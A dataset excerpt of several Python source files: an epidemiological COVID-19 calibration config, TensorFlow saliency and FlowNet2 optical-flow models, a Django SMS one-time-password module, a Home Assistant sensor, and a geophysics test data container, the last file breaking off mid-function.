id (string, lengths 1–7) | text (string, lengths 6–1.03M) | dataset_id (stringclasses, 1 value)
---|---|---|
3372757
|
<reponame>monash-emu/AuTuMN
from autumn.tools.project import Project, ParameterSet, TimeSeriesSet, build_rel_path
from autumn.tools.calibration import Calibration
from autumn.tools.calibration.priors import UniformPrior, BetaPrior
from autumn.tools.calibration.targets import (
NormalTarget,
get_dispersion_priors_for_gaussian_targets,
)
from autumn.models.covid_19 import base_params, build_model
from autumn.settings import Region, Models
from autumn.projects.covid_19.calibration import COVID_GLOBAL_PRIORS
# Load and configure model parameters.
malaysia_path = build_rel_path("../malaysia/params/default.yml")
default_path = build_rel_path("params/default.yml")
scenario_paths = [build_rel_path(f"params/scenario-{i}.yml") for i in range(10, 12)]
mle_path = build_rel_path("params/mle-params.yml")
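# Parameter layering (as applied below): the Malaysia-wide defaults are applied
# on top of the base COVID-19 parameters, then this project's own defaults, and
# finally the MLE calibration values; each scenario file is layered on top of
# that baseline.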
baseline_params = (
base_params.update(malaysia_path).update(default_path).update(mle_path, calibration_format=True)
)
scenario_params = [baseline_params.update(p) for p in scenario_paths]
param_set = ParameterSet(baseline=baseline_params, scenarios=scenario_params)
ts_set = TimeSeriesSet.from_file(build_rel_path("timeseries.json"))
notifications_ts = ts_set.get("notifications").truncate_start_time(270)
targets = [NormalTarget(notifications_ts)]
priors = [
# Global COVID priors
*COVID_GLOBAL_PRIORS,
# Dispersion parameters based on targets
*get_dispersion_priors_for_gaussian_targets(targets),
# Regional parameters
UniformPrior("contact_rate", [0.015, 0.06]),
UniformPrior("infectious_seed", [30.0, 200.0]),
# Detection
UniformPrior("testing_to_detection.assumed_cdr_parameter", [0.03, 0.15]),
# Microdistancing
UniformPrior("mobility.microdistancing.behaviour.parameters.upper_asymptote", [0.1, 0.4]),
# Health system-related
UniformPrior("clinical_stratification.props.hospital.multiplier", [0.7, 1.3]),
UniformPrior("clinical_stratification.icu_prop", [0.12, 0.25]),
UniformPrior("clinical_stratification.non_sympt_infect_multiplier", [0.15, 0.4]),
UniformPrior("clinical_stratification.props.symptomatic.multiplier", [0.8, 2.0]),
UniformPrior("vaccination.coverage_override", [0.0, 1.0], sampling="lhs"),
BetaPrior("vaccination.one_dose.vacc_prop_prevent_infection", mean=0.7, ci=[0.5, 0.9], sampling="lhs"),
UniformPrior("vaccination.one_dose.overall_efficacy", [0.0, 1.0], sampling="lhs"),
UniformPrior("voc_emergence.alpha_beta.contact_rate_multiplier", [1.0, 3.0]),
UniformPrior("voc_emergence.delta.contact_rate_multiplier", [2.0, 5.0]),
UniformPrior("voc_emergence.alpha_beta.start_time", [275, 450]),
UniformPrior("voc_emergence.delta.start_time", [450, 600]),
]
calibration = Calibration(priors, targets)
# FIXME: Replace with flexible Python plot request API.
import json
plot_spec_filepath = build_rel_path("timeseries.json")
with open(plot_spec_filepath) as f:
plot_spec = json.load(f)
project = Project(
Region.SELANGOR, Models.COVID_19, build_model, param_set, calibration, plots=plot_spec
)
|
StarcoderdataPython
|
1763591
|
<gh_stars>1-10
#-*- coding: utf-8 -*-
"""
saliency_model.py
This class implements a shallow convnet saliency prediction model [1].
The input is a 96x96 image, and the output is a 48x48 saliency map.
[1] <NAME>., <NAME>., <NAME>., <NAME>. and <NAME>.
Shallow and Deep Convolutional Networks for Saliency Prediction. In CVPR 2016.
"""
from models.base import ModelBase, BaseModelConfig
import numpy as np
from util import log
import os, os.path
import sys
import time
import tensorflow as tf
from itertools import chain
from tensorflow.contrib.layers.python.layers import (
initializers,
convolution2d, fully_connected
)
import tflearn.layers
import salicon_input_data
import crc_input_data_seq as crc_input_data
from models.model_util import tf_normalize_map
import evaluation_metrics
class SaliencyModel(ModelBase):
def __init__(self,
session,
data_sets,
config=BaseModelConfig()
):
self.session = session
self.data_sets = data_sets
self.config = config
super(SaliencyModel, self).__init__(config)
# other configuration
self.batch_size = config.batch_size
self.initial_learning_rate = config.initial_learning_rate
self.max_grad_norm = config.max_grad_norm
# Finally, build the model and optimizer
self.build_model()
self.build_train_op()
self.prepare_data()
self.session.run(tf.initialize_all_variables())
# learning rate decay
def _build_learning_rate(self):
#return tf.train.exponential_decay(
# self.initial_learning_rate,
# global_step = self.global_step,
# decay_steps = len(self.data_sets.train.images) / self.batch_size,
# decay_rate = 0.995, # per one epoch
# staircase = True,
# name="var_lr"
#)
return tf.Variable(self.initial_learning_rate,
name="var_lr", trainable=False)
@staticmethod
def create_shallownet(images, scope=None, net=None, dropout=True):
"""
Args:
images: a tensor of shape [B x H x W x C]
net: An optional dict object
scope: The variable scope for the subgraph, defaults to ShallowNet
Returns:
saliency_output: a tensor of shape [B x 48 x 48]
"""
assert len(images.get_shape()) == 4 # [B, H, W, C]
if net is None: net = {}
else: assert isinstance(net, dict)
net['dropout_keep_prob'] = tf.placeholder(tf.float32, name='dropout_keep_prob')
with tf.variable_scope(scope or 'ShallowNet'):
# CONV
net['conv1'] = convolution2d(images, 64,
kernel_size=(5, 5), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv1')
net['conv1'] = tflearn.layers.batch_normalization(net['conv1'])
net['conv1'] = tf.nn.relu(net['conv1'])
net['pool1'] = tf.nn.max_pool(net['conv1'], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool1')
log.info('Conv1 size : %s', net['conv1'].get_shape().as_list())
log.info('Pool1 size : %s', net['pool1'].get_shape().as_list())
net['conv2'] = convolution2d(net['pool1'], 128,
kernel_size=(3, 3), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv2')
net['conv2'] = tflearn.layers.batch_normalization(net['conv2'])
net['conv2'] = tf.nn.relu(net['conv2'])
net['pool2'] = tf.nn.max_pool(net['conv2'], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool2')
log.info('Conv2 size : %s', net['conv2'].get_shape().as_list())
log.info('Pool2 size : %s', net['pool2'].get_shape().as_list())
net['conv3'] = convolution2d(net['pool2'], 128,
kernel_size=(3, 3), stride=(1, 1), padding='VALID',
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer_conv2d(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='conv3')
net['conv3'] = tflearn.layers.batch_normalization(net['conv3'])
net['conv3'] = tf.nn.relu(net['conv3'])
net['pool3'] = tf.nn.max_pool(net['conv3'], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1],
padding='SAME', name='pool3')
log.info('Conv3 size : %s', net['conv3'].get_shape().as_list())
log.info('Pool3 size : %s', net['pool3'].get_shape().as_list())
# FC layer
n_inputs = int(np.prod(net['pool3'].get_shape().as_list()[1:]))
pool3_flat = tf.reshape(net['pool3'], [-1, n_inputs])
net['fc1'] = fully_connected(pool3_flat, 98,
activation_fn=None,#tf.nn.relu,
weight_init=initializers.xavier_initializer(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='fc1')
log.info('fc1 size : %s', net['fc1'].get_shape().as_list())
net['fc1'] = tflearn.layers.batch_normalization(net['fc1'])
net['fc1'] = tf.nn.relu(net['fc1'])
if dropout:
net['fc1'] = tf.nn.dropout( net['fc1'], net['dropout_keep_prob'] )
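# maxout: split the fc1 units into two halves and take the elementwise maximum
# (the same split/maximum pattern is applied again after fc2 below)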
fc1_slice1, fc1_slice2 = tf.split(1, 2, net['fc1'], name='fc1_slice')
net['max_out'] = tf.maximum(fc1_slice1, fc1_slice2, name='fc1_maxout')
log.info('maxout size : %s', net['max_out'].get_shape().as_list())
net['fc2'] = fully_connected(net['max_out'], 98 ,
activation_fn=None, # no relu here
weight_init=initializers.xavier_initializer(uniform=True),
bias_init=tf.constant_initializer(0.0),
weight_collections=['MODEL_VARS'], bias_collections=['MODEL_VARS'],
name='fc2')
net['fc2'] = tflearn.layers.batch_normalization(net['fc2'])
net['fc2'] = tf.nn.relu(net['fc2'])
#if dropout:
# net['fc2'] = tf.nn.dropout( net['fc2'], net['dropout_keep_prob'] )
log.info('fc2 size : %s', net['fc2'].get_shape().as_list())
fc2_slice1, fc2_slice2 = tf.split(1, 2, net['fc2'], name='fc2_slice')
net['max_out2'] = tf.maximum(fc2_slice1, fc2_slice2, name='fc2_maxout')
# debug and summary
#net['fc1'].get_shape().assert_is_compatible_with([None, 4802])
#net['fc2'].get_shape().assert_is_compatible_with([None, 4802])
#net['fc3'].get_shape().assert_is_compatible_with([None, 4802])
#for t in [self.conv1, self.conv2, self.conv3,
# self.pool1, self.pool2, self.pool3,
# self.fc1, self.max_out, self.fc2]:
# _add_activation_histogram_summary(t)
net['saliency'] = tf.reshape(net['max_out2'], [-1, 7, 7],
name='saliency')
return net['saliency']
def build_model(self):
self.images = tf.placeholder(tf.float32, shape=(None, 98, 98, 3))
log.info('images : %s', self.images.get_shape().as_list())
# saliency maps (GT)
self.saliencymaps_gt = tf.placeholder(tf.float32, shape=(None, 7, 7))
log.info('gt_saliencymaps : %s', self.saliencymaps_gt.get_shape().as_list())
# shallow net (inference)
net = {}
self.saliency_output = SaliencyModel.create_shallownet(
self.images,
net=net
)
self.dropout_keep_prob = net['dropout_keep_prob']
log.info('saliency output: %s', self.saliency_output.get_shape().as_list())
def _add_activation_histogram_summary(tensor):
# WARNING: This summary WILL MAKE LEARNING EXTREMELY SLOW
tf.histogram_summary(tensor.name + '/activation', tensor)
tf.histogram_summary(tensor.name + '/sparsity', tf.nn.zero_fraction(tensor))
if hasattr(tensor, 'W'): tf.histogram_summary(tensor.name + '/W', tensor.W)
if hasattr(tensor, 'b'): tf.histogram_summary(tensor.name + '/b', tensor.b)
# build euclidean loss
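# target_loss is a mean squared error over the saliency map: tf.nn.l2_loss
# returns sum(x**2)/2, so the factor 2.0 recovers the plain sum of squares,
# which is then divided by the map size (7*7) and the batch size;
# reg_loss adds a small L2 penalty on all MODEL_VARS weights.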
self.reg_loss = 1e-7 * sum([tf.nn.l2_loss(t) for t in tf.get_collection('MODEL_VARS')])
self.target_loss = 2.0 * tf.nn.l2_loss(self.saliency_output - self.saliencymaps_gt) / (7 * 7)
self.target_loss = tf.div(self.target_loss, self.batch_size, name='loss_normalized')
self.loss = self.reg_loss + self.target_loss
tf.scalar_summary('loss/total/train', self.loss)
tf.scalar_summary('loss/total/val', self.loss, collections=['TEST_SUMMARIES'])
tf.scalar_summary('loss/target/train', self.target_loss)
tf.scalar_summary('loss/target/val', self.target_loss, collections=['TEST_SUMMARIES'])
# Debugging Informations
# ----------------------
# OPTIONAL: for debugging and visualization
def _add_image_summary(tag, tensor):
return tf.image_summary(tag, tensor, max_images=2, collections=['IMAGE_SUMMARIES'])
_add_image_summary('inputimage', self.images)
_add_image_summary('saliency_maps_gt', tf.expand_dims(self.saliencymaps_gt, 3))
_add_image_summary('saliency_maps_pred_original',
tf.reshape(self.saliency_output, [-1, 7, 7, 1]))
_add_image_summary('saliency_maps_pred_norm',
tf.reshape(tf_normalize_map(self.saliency_output), [-1, 7, 7, 1]))
# normalize_map -> tf_normalize_map
self.image_summaries = tf.merge_summary(
inputs = tf.get_collection('IMAGE_SUMMARIES'),
collections = [],
name = 'merged_image_summary',
)
# activations
self.model_var_summaries = tf.merge_summary([
tf.histogram_summary(var.name, var, collections=[]) \
for var in tf.get_collection('MODEL_VARS')
])
def prepare_data(self):
self.n_train_instances = len(self.data_sets.train.images)
def single_step(self, train_mode=True):
_start_time = time.time()
""" prepare the input (get batch-style tensor) """
_dataset = train_mode and self.data_sets.train \
or self.data_sets.valid
batch_images, batch_saliencymaps = _dataset.next_batch(self.batch_size)[:2]
if len(batch_images[0].shape) == 4:
# the batch may carry a temporal axis [B x T x 96 x 96 x 3];
# in the plain saliency model we concatenate all frames
# and learn/evaluate each frame independently.
batch_images = np.concatenate(batch_images)
batch_saliencymaps = np.concatenate(batch_saliencymaps)
# Flip half of the images in this batch at random:
if train_mode and self.config.use_flip_batch:
batch_size = len(batch_images)
indices = np.random.choice(batch_size, batch_size / 2, replace=False)
batch_images[indices, :] = batch_images[indices, :, ::-1, :]
batch_saliencymaps[indices, :] = batch_saliencymaps[indices, :, ::-1]
""" run the optimization step """
_merged_summary = {True: self.merged_summary_train,
False: self.merged_summary_val}[train_mode]
eval_targets = [self.loss, self.target_loss, self.reg_loss, _merged_summary]
if train_mode: eval_targets += [self.train_op]
if not train_mode:
eval_targets += [self.image_summaries]
eval_targets += [self.model_var_summaries]
eval_result = dict(zip(eval_targets, self.session.run(
eval_targets,
feed_dict = {
self.images : batch_images,
self.saliencymaps_gt : batch_saliencymaps,
self.dropout_keep_prob : 0.4 if train_mode else 1.0
}
)))
loss = eval_result[self.loss]
target_loss = eval_result[self.target_loss]
reg_loss = eval_result[self.reg_loss]
summary = eval_result[_merged_summary]
step = self.current_step
epoch = float(step * self.batch_size) / self.n_train_instances # estimated epoch
if step >= 20:
self.writer.add_summary(summary, step)
if not train_mode:
image_summary = eval_result[self.image_summaries]
self.writer.add_summary(image_summary, step)
var_summary = eval_result[self.model_var_summaries]
self.writer.add_summary(var_summary, step)
_end_time = time.time()
if (not train_mode) or np.mod(step, self.config.steps_per_logprint) == 0:
log_fn = (train_mode and log.info or log.infov)
log_fn((" [{split_mode:5} epoch {epoch:.1f} / step {step:4d}] " +
"batch total-loss: {total_loss:.5f}, target-loss: {target_loss:.5f} " +
"({sec_per_batch:.3f} sec/batch, {instance_per_sec:.3f} instances/sec)"
).format(split_mode=(train_mode and 'train' or 'val'),
epoch=epoch, step=step,
total_loss=loss, target_loss=target_loss,
sec_per_batch=(_end_time - _start_time),
instance_per_sec=self.batch_size / (_end_time - _start_time)
)
)
return step
def evaluate(self, dataset):
num_steps = len(dataset) / self.batch_size
gt_maps = [] # GT saliency maps (each 48x48)
pred_maps = [] # predicted saliency maps (each 48x48)
fixation_maps = []
for v in range(num_steps):
if v % 10 == 0: log.info('Evaluating step %d ...', v)
batch_images, batch_saliencymaps, batch_fixationmaps = \
dataset.next_batch(self.batch_size)[:3]
if len(batch_images[0].shape) == 4:
# the batch may carry a temporal axis [B x T x 96 x 96 x 3];
# in the plain saliency model we concatenate all frames
# and learn/evaluate each frame independently.
batch_images = np.concatenate(batch_images)
batch_saliencymaps = np.concatenate(batch_saliencymaps)
batch_fixationmaps = chain(*batch_fixationmaps)
[saliency_output, ] = self.session.run(
[self.saliency_output, ],
feed_dict = {
self.images : batch_images,
self.saliencymaps_gt : batch_saliencymaps,
self.dropout_keep_prob : 1.0
})
saliency_output = saliency_output.reshape(-1, 7, 7)
assert len(saliency_output) == len(batch_saliencymaps)
gt_maps.extend(batch_saliencymaps)
pred_maps.extend(saliency_output)
fixation_maps.extend(batch_fixationmaps)
# Evaluate.
batch_scores = {}
log.infov('Validation on total %d images', len(pred_maps))
for metric in evaluation_metrics.AVAILABLE_METRICS:
batch_scores[metric] = evaluation_metrics.saliency_score(metric, pred_maps, gt_maps, fixation_maps)
log.infov('Saliency %s : %f', metric, batch_scores[metric])
self.report_evaluate_summary(batch_scores)
def self_test(args):
global model, data_sets
session = tf.Session(config=tf.ConfigProto(
gpu_options=tf.GPUOptions(per_process_gpu_memory_fraction=0.5),
device_count={'GPU': True}, # set 'GPU': 0 to force CPU-only self-testing
))
log.warn('Loading %s input data ...', args.dataset)
if args.dataset == 'salicon':
data_sets = salicon_input_data.read_salicon_data_sets(
98, 98, 7, 7, np.float32,
use_example=False, # only tens
use_val_split=True,
) # self test small only
elif args.dataset == 'crc':
data_sets = crc_input_data.read_crc_data_sets(
98, 98, 7, 7, np.float32,
use_cache=True
)
else:
raise ValueError('Unknown dataset : %s' % args.dataset)
print 'Train', data_sets.train
print 'Validation', data_sets.valid
log.warn('Building Model ...')
# default configuration as of now
config = BaseModelConfig()
config.train_dir = args.train_dir
if args.train_tag:
config.train_tag = args.train_tag
config.batch_size = 200
config.use_flip_batch = True
#config.initial_learning_rate = 0.03
config.initial_learning_rate = 0.00003
config.optimization_method = 'adam'
config.steps_per_evaluation = 7000 # for debugging
if args.learning_rate is not None:
config.initial_learning_rate = float(args.learning_rate)
if args.learning_rate_decay is not None:
config.learning_rate_decay = float(args.learning_rate_decay)
if args.batch_size is not None:
config.batch_size = int(args.batch_size)
if args.max_steps:
config.max_steps = int(args.max_steps)
if args.dataset == 'crc':
config.batch_size = 2 # because of T~=35
config.steps_per_evaluation = 200
config.dump(sys.stdout)
log.warn('Start Fitting Model ...')
model = SaliencyModel(session, data_sets, config)
print model
model.fit()
log.warn('Fitting Done. Evaluating!')
model.evaluate(data_sets.test)
#session.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--dataset', default='salicon', help='[salicon, crc]')
parser.add_argument('--max_steps', default=None, type=int)
parser.add_argument('--batch_size', default=None, type=int)
parser.add_argument('--train_dir', default=None, type=str)
parser.add_argument('--train_tag', '--tag', default=None, type=str)
parser.add_argument('--learning_rate', default=None, type=float)
parser.add_argument('--learning_rate_decay', default=None, type=float)
args = parser.parse_args()
self_test(args)
|
StarcoderdataPython
|
1779837
|
<gh_stars>0
from constants import *
from game_utility import *
def game_verb_check_results(game):
needs = game[IDX_todolist]
if len(needs) == 0:
message = ' checks the ingredient list, and points out we have everything we need. Well done, team!\n\n'
message += 'Congratulations on finishing a Chef Quest! You finished at ' + time_of_day(game[IDX_time])
message += '. Play again and see if you can do it faster!\n\nYou are now back in the Lobby. '
message += '[create] a new game, or [join] an existing one (leave the name blank to see what is available)'
return message
message = ' checks the ingredient list, and figures we still need to find:'
for name, amnt in needs.iteritems():
message += '\n' + str(amnt) + ' x ' + name
return message
|
StarcoderdataPython
|
1728725
|
<filename>ax3_OTP_Auth/hotp.py
from secrets import token_urlsafe
from django.core.cache import cache
from django.utils.module_loading import import_string
import boto3
import pyotp
from . import settings
class HOTP:
def __init__(self, unique_id: str, digits: int = 6):
self._unique_id = unique_id
self._digits = digits
self._ttl = settings.OTP_AUTH_TTL
def _create_secret(self, secret: str) -> str:
cache.set('{}.secret'.format(self._unique_id), secret, timeout=self._ttl)
return secret
def _create_counter(self) -> str:
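# cache.incr raises ValueError when the key does not exist yet, in which case
# the counter is initialised to 1 with the configured TTL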
try:
cache.incr('{}.counter'.format(self._unique_id))
except ValueError:
cache.set('{}.counter'.format(self._unique_id), 1, timeout=self._ttl)
return cache.get('{}.counter'.format(self._unique_id))
def _create_token(self, phone_number: int) -> str:
token = token_urlsafe()
cache.set(token, phone_number, timeout=self._ttl)
return token
def _get_secret(self):
return cache.get('{}.secret'.format(self._unique_id))
def _get_counter(self):
return cache.get('{}.counter'.format(self._unique_id))
def _send_sms(self, sms_code: int, country_code: str, phone_number: int):
message = settings.OTP_AUTH_MESSAGE.format(sms_code)
if settings.OTP_CUSTOM_SMS_GATEWAY:
gateway = import_string(settings.OTP_CUSTOM_SMS_GATEWAY)
gateway(country_code=country_code, phone_number=phone_number, message=message)
else:
sns = boto3.client(
'sns',
aws_access_key_id=settings.AWS_ACCESS_KEY_ID,
aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,
region_name=settings.AWS_DEFAULT_REGION
)
sns.publish(
PhoneNumber=f'+{country_code}{phone_number}',
Message=message,
MessageAttributes={
'AWS.SNS.SMS.SMSType': {
'DataType': 'String',
'StringValue': 'Transactional'
}
}
)
def create(self, country_code: str, phone_number: int):
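# HOTP (RFC 4226): the SMS code is derived from a cached per-user secret and an
# incrementing counter, so verify() can re-derive and check the same code later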
secret = self._create_secret(secret=pyotp.random_base32(length=32))
counter = self._create_counter()
hotp = pyotp.HOTP(secret, digits=self._digits)
self._send_sms(
sms_code=hotp.at(counter),
country_code=country_code,
phone_number=phone_number
)
def verify(self, sms_code: int, phone_number: int) -> str:
secret = self._get_secret()
count = self._get_counter()
if count and secret:
hotp = pyotp.HOTP(secret, digits=self._digits)
if hotp.verify(sms_code, count):
return self._create_token(phone_number=phone_number)
return None
def get_phone_number(self, token: str) -> int:
phone_number = cache.get(token)
cache.delete(token)
cache.delete_pattern('{}.*'.format(self._unique_id))
return phone_number
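# Minimal usage sketch (not part of the original module; the identifiers and
# numbers below are placeholders, and Django's cache plus the OTP settings are
# assumed to be configured):
#
#   otp = HOTP(unique_id='signup:some-session-key')
#   otp.create(country_code='57', phone_number=3001234567)        # sends the SMS
#   token = otp.verify(sms_code=123456, phone_number=3001234567)  # None if wrong
#   if token:
#       phone = otp.get_phone_number(token)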
|
StarcoderdataPython
|
1635149
|
<gh_stars>1-10
"""Sensor platform for NorwegianWeather."""
import logging
from .const import DOMAIN
from .entity import NorwegianWeatherEntity
_LOGGER: logging.Logger = logging.getLogger(__package__)
async def async_setup_entry(hass, entry, async_add_devices):
"""Setup sensor platform."""
coordinator = hass.data[DOMAIN][entry.entry_id]
entities = coordinator.get_sensor_entities()
_LOGGER.debug(
f"Setting up sensor platform for {coordinator.place}, {len(entities)} entities"
)
async_add_devices(entities)
class NorwegianWeatherSensor(NorwegianWeatherEntity):
"""NorwegianWeather Sensor class."""
@property
def state(self):
"""Return the state of the sensor."""
return self._state
|
StarcoderdataPython
|
3268925
|
<reponame>j-gallistl/reda
"""Dummy data containers for testing purposes."""
import pandas as pd
import numpy as np
import reda
# construct a simple container using random numbers
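# columns follow the usual ERT convention: a/b are the current electrodes,
# m/n the potential electrodes, and r the measured transfer resistance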
df = pd.DataFrame(columns=list("abmnr"))
df.a = np.arange(1, 23)
df.b = df.a + 1
df.m = df.a + 2
df.n = df.b + 2
np.random.seed(0)
df.r = np.random.randn(len(df.r))
ERTContainer = reda.ERT(data=df)
# construct an ERT container with normal and reciprocal data
df = pd.DataFrame(
[
# normals
(0, 1, 2, 4, 3, 1.1),
(0, 1, 2, 5, 4, 1.2),
(0, 1, 2, 6, 5, 1.3),
(0, 1, 2, 7, 6, 1.4),
(0, 2, 3, 5, 4, 1.5),
(0, 2, 3, 6, 5, 1.6),
(0, 2, 3, 7, 6, 1.7),
(0, 3, 4, 6, 5, 1.8),
(0, 3, 4, 7, 6, 1.9),
(0, 4, 5, 7, 6, 2.0),
# reciprocals
(0, 4, 3, 1, 2, 1.1),
(0, 5, 4, 1, 2, 1.2),
(0, 6, 5, 1, 2, 1.3),
(0, 7, 6, 1, 2, 1.4),
(0, 5, 4, 2, 3, 1.5),
(0, 6, 5, 2, 3, 1.6),
(0, 7, 6, 2, 3, 1.7),
(0, 6, 5, 3, 4, 1.8),
(0, 7, 6, 3, 4, 1.9),
(0, 7, 6, 4, 5, 2.0),
],
columns=[
'timestep',
'a',
'b',
'm',
'n',
'r',
]
)
# now add gaussian noise to the reciprocals
df.loc[10:20, 'r'] += np.random.randn(10)
ERTContainer_nr = reda.ERT(data=df)
|
StarcoderdataPython
|
19773
|
import glob, os
import numpy as np
import tensorflow as tf
import tensorflow.contrib.graph_editor as ge
class Flownet2:
def __init__(self, bilinear_warping_module):
self.weights = dict()
for key, shape in self.all_variables():
self.weights[key] = tf.get_variable(key, shape=shape)
self.bilinear_warping_module = bilinear_warping_module
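# bilinear_warping_module is expected to be an externally compiled TF op module
# exposing bilinear_warping(images, flow); see warp() below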
def leaky_relu(self, x, s):
assert s > 0 and s < 1, "Wrong s"
return tf.maximum(x, s*x)
def warp(self, x, flow):
return self.bilinear_warping_module.bilinear_warping(x, tf.stack([flow[:,:,:,1], flow[:,:,:,0]], axis=3))
# flip=True -> channel 0 is the y axis (pointing downwards) and channel 1 is
# the x axis, i.e. matrix-style indexing
# flip=False -> channel 0 is x and channel 1 is y
def __call__(self, im0, im1, flip=True):
f = self.get_blobs(im0, im1)['predict_flow_final']
if flip:
f = tf.stack([f[:,:,:,1], f[:,:,:,0]], axis=3)
return f
def get_optimizer(self, flow, target, learning_rate=1e-4):
#flow = self.__call__(im0, im1)
loss = tf.reduce_sum(flow * target) # target holding the gradients!
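# inner-product trick: with loss = sum(flow * target), d(loss)/d(flow) == target,
# so externally computed gradients can be injected through the flow network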
opt = tf.train.AdamOptimizer(learning_rate=learning_rate, beta1=0.95, beta2=0.99, epsilon=1e-8)
opt = opt.minimize(loss, var_list=
# [v for k,v in self.weights.iteritems() if (k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_'))])
[v for k,v in self.weights.iteritems() if ((k.startswith('net3_') or k.startswith('netsd_') or k.startswith('fuse_')) and not ('upsample' in k or 'deconv' in k))])
return opt, loss
# If I run the network with large images (1024x2048) it crashes due to memory
# constraints on a 12 GB Titan X.
# See https://github.com/tensorflow/tensorflow/issues/5816#issuecomment-268710077
# for a possible explanation. I fix it by adding run_after in the section with
# the correlation layer so that the 441 large tensors are not all allocated at the same time
def run_after(self, a_tensor, b_tensor):
"""Force a to run after b"""
ge.reroute.add_control_inputs(a_tensor.op, [b_tensor.op])
# without the epsilon I get NaN errors when backpropagating
def l2_norm(self, x):
return tf.sqrt(tf.maximum(1e-5, tf.reduce_sum(x**2, axis=3, keep_dims=True)))
def get_blobs(self, im0, im1):
blobs = dict()
batch_size = tf.to_int32(tf.shape(im0)[0])
width = tf.to_int32(tf.shape(im0)[2])
height = tf.to_int32(tf.shape(im0)[1])
TARGET_WIDTH = width
TARGET_HEIGHT = height
divisor = 64.
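# the encoder downsamples six times by a factor of 2, so inputs are resized to
# the next multiple of 64 and the predicted flow is rescaled back at the end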
ADAPTED_WIDTH = tf.to_int32(tf.ceil(tf.to_float(width)/divisor) * divisor)
ADAPTED_HEIGHT = tf.to_int32(tf.ceil(tf.to_float(height)/divisor) * divisor)
SCALE_WIDTH = tf.to_float(width) / tf.to_float(ADAPTED_WIDTH);
SCALE_HEIGHT = tf.to_float(height) / tf.to_float(ADAPTED_HEIGHT);
blobs['img0'] = im0
blobs['img1'] = im1
blobs['img0s'] = blobs['img0']*0.00392156862745098
blobs['img1s'] = blobs['img1']*0.00392156862745098
#mean = np.array([0.411451, 0.432060, 0.450141])
mean = np.array([0.37655231, 0.39534855, 0.40119368])
blobs['img0_nomean'] = blobs['img0s'] - mean
blobs['img1_nomean'] = blobs['img1s'] - mean
blobs['img0_nomean_resize'] = tf.image.resize_bilinear(blobs['img0_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['img1_nomean_resize'] = tf.image.resize_bilinear(blobs['img1_nomean'], size=[ADAPTED_HEIGHT, ADAPTED_WIDTH], align_corners=True)
blobs['conv1a'] = tf.pad(blobs['img0_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1a'] = tf.nn.conv2d(blobs['conv1a'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1a'] = self.leaky_relu(blobs['conv1a'], 0.1)
blobs['conv1b'] = tf.pad(blobs['img1_nomean_resize'], [[0,0], [3,3], [3,3], [0,0]])
blobs['conv1b'] = tf.nn.conv2d(blobs['conv1b'], self.weights['conv1_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv1_b']
blobs['conv1b'] = self.leaky_relu(blobs['conv1b'], 0.1)
blobs['conv2a'] = tf.pad(blobs['conv1a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2a'] = tf.nn.conv2d(blobs['conv2a'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2a'] = self.leaky_relu(blobs['conv2a'], 0.1)
blobs['conv2b'] = tf.pad(blobs['conv1b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv2b'] = tf.nn.conv2d(blobs['conv2b'], self.weights['conv2_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv2_b']
blobs['conv2b'] = self.leaky_relu(blobs['conv2b'], 0.1)
blobs['conv3a'] = tf.pad(blobs['conv2a'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3a'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3a'] = self.leaky_relu(blobs['conv3a'], 0.1)
blobs['conv3b'] = tf.pad(blobs['conv2b'], [[0,0], [2,2], [2,2], [0,0]])
blobs['conv3b'] = tf.nn.conv2d(blobs['conv3b'], self.weights['conv3_w'], strides=[1,2,2,1], padding="VALID") + self.weights['conv3_b']
blobs['conv3b'] = self.leaky_relu(blobs['conv3b'], 0.1)
# correlation layer, implemented explicitly (which might be considered a bit
# hacky): for each of the 21x21 = 441 displacements (steps of 2), shift conv3b
# against conv3a and average the elementwise product over the feature channels
tmp = []
x1_l = []
x2_l = []
for di in range(-20, 21, 2):
for dj in range(-20, 21, 2):
x1 = tf.pad(blobs['conv3a'], [[0,0], [20,20], [20,20], [0,0]])
x2 = tf.pad(blobs['conv3b'], [[0,0], [20-di,20+di], [20-dj,20+dj], [0,0]])
x1_l.append(x1)
x2_l.append(x2)
c = tf.nn.conv2d(x1*x2, tf.ones([1, 1, 256, 1])/256., strides=[1,1,1,1], padding='VALID')
tmp.append(c[:,20:-20,20:-20,:])
for i in range(len(tmp)-1):
#self.run_after(tmp[i], tmp[i+1])
self.run_after(x1_l[i], tmp[i+1])
self.run_after(x2_l[i], tmp[i+1])
blobs['corr'] = tf.concat(tmp, axis=3)
blobs['corr'] = self.leaky_relu(blobs['corr'], 0.1)
blobs['conv_redir'] = tf.nn.conv2d(blobs['conv3a'], self.weights['conv_redir_w'], strides=[1,1,1,1], padding="VALID") + self.weights['conv_redir_b']
